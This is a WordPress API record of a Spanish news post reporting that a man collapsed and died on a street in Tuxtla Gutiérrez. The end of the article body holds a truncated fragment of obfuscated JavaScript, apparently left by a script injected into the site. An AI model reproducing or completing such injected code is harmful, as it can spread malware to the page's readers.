{"id":19681,"date":"2025-01-09T05:48:47","date_gmt":"2025-01-09T05:48:47","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=19681"},"modified":"2025-01-09T05:48:48","modified_gmt":"2025-01-09T05:48:48","slug":"hombre-pierde-la-vida-en-la-via-publica-2","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=19681","title":{"rendered":"Hombre pierde la vida en la v\u00eda p\u00fablica"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250108-WA0036-1024x768.jpg\" alt=\"\" class=\"wp-image-19682\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250108-WA0036-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250108-WA0036-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250108-WA0036-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250108-WA0036-1536x1152.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250108-WA0036-2048x1536.jpg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 8 de enero del 2025. Tuxtla Guti\u00e9rrez. &#8211; Este mi\u00e9rcoles por la ma\u00f1ana, un hombre perdi\u00f3 la vid@ tras desplomarse cuando caminaba en la Avenida Francisco I Madero y la Calzada Pencil de la Colonia Bienestar Social de Tuxtla Guti\u00e9rrez.<\/p>\n\n\n\n<p>Los reportes oficiales informaron que, este hecho ocurri\u00f3 cerca de las 8 de la ma\u00f1ana frente a una conocida iglesia.<\/p>\n\n\n\n<p>Los mismos vecinos relataron que, el hombre caminaba y de manera repentina se desvaneci\u00f3.<\/p>\n\n\n\n<p>Tras llamar a los n\u00fameros de emergencias al lugar arribaron param\u00e9dicos del cuerpo de Bomberos pero ya hab\u00eda perdido la vida a causa de su alcoholismo.<\/p>\n\n\n\n<p>En el lugar no fue reconocido \u00fanicamente se supo que deambulaba por la zona.<\/p>\n\n\n\n<p>Peritos de la Fiscal\u00eda General del Estado, realizaron las diligencias correspondientes, levantaron el cuerpo y lo trasladaron al Semefo donde se practicar\u00eda la necropsia de ley.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 8 de enero del 2025. Tuxtla Guti\u00e9rrez. &#8211; Este mi\u00e9rcoles por la ma\u00f1ana, un hombre perdi\u00f3 la vid@ tras desplomarse cuando caminaba en la Avenida Francisco I Madero y la Calzada Pencil de la Colonia Bienestar Social de Tuxtla Guti\u00e9rrez. Los reportes oficiales informaron que, este hecho ocurri\u00f3 cerca de las &hellip;<\/p>\n","protected":false},"author":2,"featured_media":19682,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-19681","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19681","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=19681"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19681\/revisions"}],"predecessor-version":[{"id":19683,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19681\/revisions\/19683"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/19682"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=19681"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=19681"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=19681"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}